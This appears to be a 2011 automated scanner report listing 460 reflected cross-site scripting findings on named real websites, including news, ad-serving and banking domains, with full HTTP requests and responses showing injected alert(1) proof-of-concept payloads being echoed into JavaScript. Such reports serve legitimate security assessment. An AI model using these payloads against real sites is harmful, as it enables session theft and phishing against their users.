1.324. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.325. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.326. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.327. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4! [PC_7_1_CKB_number_of_rf parameter]

1.328. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.329. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.330. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.331. https://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]

1.332. http://www.nations-baseball.com/index.cfm [event parameter]

1.333. http://www.northeastassembly.org/favicon.ico [REST URL parameter 1]

1.334. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 1]

1.335. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 2]

1.336. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 3]

1.337. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 4]

1.338. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 1]

1.339. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 2]

1.340. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 3]

1.341. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 4]

1.342. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 1]

1.343. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 2]

1.344. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 3]

1.345. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 4]

1.346. http://www.nydailynews.com/index.html [REST URL parameter 1]

1.347. http://www.nydailynews.com/news/index.html [REST URL parameter 1]

1.348. http://www.nydailynews.com/news/index.html [REST URL parameter 2]

1.349. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 1]

1.350. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 2]

1.351. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 3]

1.352. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 4]

1.353. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 5]

1.354. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 6]

1.355. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [REST URL parameter 1]

1.356. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter]

1.357. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter]

1.358. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter]

1.359. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter]

1.360. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter]

1.361. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 1]

1.362. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 2]

1.363. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 3]

1.364. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 4]

1.365. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 5]

1.366. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 6]

1.367. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 7]

1.368. http://www.nydailynews.com/sports/index.html [REST URL parameter 1]

1.369. http://www.nydailynews.com/sports/index.html [REST URL parameter 2]

1.370. http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter]

1.371. http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter]

1.372. http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter]

1.373. http://www.rbisaleschallenge.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.374. http://www.rightnow.com/company-contact.php [REST URL parameter 1]

1.375. http://www.rightnow.com/company-contact.php [name of an arbitrarily supplied request parameter]

1.376. http://www.rightnow.com/cx.html [REST URL parameter 1]

1.377. http://www.rightnow.com/cx.html [name of an arbitrarily supplied request parameter]

1.378. http://www.rightnow.com/cx.php [REST URL parameter 1]

1.379. http://www.rightnow.com/cx.php [name of an arbitrarily supplied request parameter]

1.380. http://www.rightnow.com/favicon.ico [REST URL parameter 1]

1.381. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 1]

1.382. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 2]

1.383. http://www.rightnow.com/floatbox/graphics/loader_iframe_white.html [REST URL parameter 3]

1.384. http://www.rightnow.com/helvetica-bold-webfont.woff [REST URL parameter 1]

1.385. http://www.rightnow.com/helvetica-light-webfont.woff [REST URL parameter 1]

1.386. http://www.rightnow.com/helvetica-webfont.ttf [REST URL parameter 1]

1.387. http://www.rightnow.com/helvetica-webfont.woff [REST URL parameter 1]

1.388. http://www.rightnow.com/helvetica_bold-webfont.woff [REST URL parameter 1]

1.389. http://www.rightnow.com/helvetica_light-normal-webfont.woff [REST URL parameter 1]

1.390. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 1]

1.391. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 2]

1.392. http://www.rightnow.com/javascript/floatbox/floatbox.css [REST URL parameter 3]

1.393. http://www.rightnow.com/javascript/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]

1.394. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 1]

1.395. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 2]

1.396. http://www.rightnow.com/javascript/floatbox/floatbox.js [REST URL parameter 3]

1.397. http://www.rightnow.com/javascript/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]

1.398. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 1]

1.399. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 2]

1.400. http://www.rightnow.com/javascript/floatbox/options.js [REST URL parameter 3]

1.401. http://www.rightnow.com/javascript/floatbox/options.js [name of an arbitrarily supplied request parameter]

1.402. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 1]

1.403. http://www.rightnow.com/javascript/form.110610.js [REST URL parameter 2]

1.404. http://www.rightnow.com/javascript/form.110610.js [name of an arbitrarily supplied request parameter]

1.405. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 1]

1.406. http://www.rightnow.com/javascript/omniture_variable_setup.js [REST URL parameter 2]

1.407. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 1]

1.408. http://www.rightnow.com/javascript/omniture_variable_setup_part2.js [REST URL parameter 2]

1.409. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 1]

1.410. http://www.rightnow.com/javascript/ooyalabacklotapi.php [REST URL parameter 2]

1.411. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 1]

1.412. http://www.rightnow.com/javascript/rightnow.tv.player.swf [REST URL parameter 2]

1.413. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 1]

1.414. http://www.rightnow.com/javascript/s_code.js [REST URL parameter 2]

1.415. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 1]

1.416. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 2]

1.417. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [REST URL parameter 3]

1.418. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]

1.419. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 1]

1.420. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 2]

1.421. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [REST URL parameter 3]

1.422. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]

1.423. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 1]

1.424. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 2]

1.425. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 3]

1.426. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter]

1.427. http://www.rightnow.com/mobile.css [REST URL parameter 1]

1.428. http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter]

1.429. http://www.rightnow.com/rightnow_secondary.css [REST URL parameter 1]

1.430. http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter]

1.431. http://www.rightnow.com/search/ [REST URL parameter 1]

1.432. http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter]

1.433. http://www.rightnow.com/search/ [q parameter]

1.434. http://www.rightnow.com/search/ [q parameter]

1.435. http://www.robtex.com/ext/soc/x [url parameter]

1.436. https://www.superinn.com/copy1/ResMain.asp [crypt parameter]

1.437. https://www.superinn.com/frametest.asp [dk parameter]

1.438. https://www.superinn.com/frametest.asp [nightnum parameter]

1.439. https://www.superinn.com/frametest.asp [nip parameter]

1.440. https://www.superinn.com/frametest.asp [propid parameter]

1.441. https://www.superinn.com/frametest.asp [rd parameter]

1.442. https://www.superinn.com/frametest.asp [rddate parameter]

1.443. https://www.superinn.com/frametest.asp [wrnum parameter]

1.444. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.445. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.446. http://www.tigerdirect.com/applications/SearchTools/search.asp [keywords parameter]

1.447. http://www.tigerdirect.com/applications/SearchTools/search.asp [name of an arbitrarily supplied request parameter]

1.448. http://www.tigerdirect.com/go/windows-7/ [srkey parameter]

1.449. http://www.voanews.com/english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html [name of an arbitrarily supplied request parameter]

1.450. http://www.win-rar.com/index.php [dl parameter]

1.451. http://www.win-rar.com/index.php [name of an arbitrarily supplied request parameter]

1.452. https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter]

1.453. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [Referer HTTP header]

1.454. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [Referer HTTP header]

1.455. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

1.456. http://www.tigerdirect.com/applications/SearchTools/search.asp [Referer HTTP header]

1.457. http://www.tigerdirect.com/applications/SearchTools/search.asp [Referer HTTP header]

1.458. https://www.zulily.com/index.php/customer/account/create/ [Referer HTTP header]

1.459. http://a.collective-media.net/cmadj/ns.informit/homepage [cli cookie]

1.460. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [cli cookie]



1. Cross-site scripting (reflected)
There are 460 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29f0'-alert(1)-'495cc3a8968 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynewse29f0'-alert(1)-'495cc3a8968/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:36 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:36 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynewse29f0'-alert(1)-'495cc3a8968/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ed7'-alert(1)-'b5d97559d24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr54ed7'-alert(1)-'b5d97559d24;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:38 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr54ed7'-alert(1)-'b5d97559d24;sz=728x90;net=q1;ord=1313102451.47533?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2432'-alert(1)-'629570ea7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533?&c2432'-alert(1)-'629570ea7b8=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:34 GMT
Content-Length: 468

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?&c2432'-alert(1)-'629570ea7b8=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.nydailynews/be_news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfab9'-alert(1)-'5998b10273a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.nydailynews/be_news_fr;sz=728x90;click0=;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGx1amJvdChnaWQkZjZmN2Q0ZGEtYzQ2YS0xMWUwLWEyYjQtM2YyMmYzYmY4YzBlLHN0JDEzMTMxMDI0NTEwMTI0OTUsc2kkNTA1NTUxLHYkMS4wLGFpZCQ1Rm1rTGtTMHF1by0sY3QkMjUseWJ4JENHT1hoNkprY2dYREtYc2F3QUhrTVEsciQwKSk/1/*;ord=1313102451.47533?cfab9'-alert(1)-'5998b10273a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:32 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:32 GMT
Content-Length: 465

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?cfab9'-alert(1)-'5998b10273a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/cmadj/ns.informit/homepage [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.informit/homepage

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf09'-alert(1)-'882062a794c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.informitadf09'-alert(1)-'882062a794c/homepage;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?;ord1=418181;cmpgurl=http%253A//www.informit.com/index.aspx? HTTP/1.1
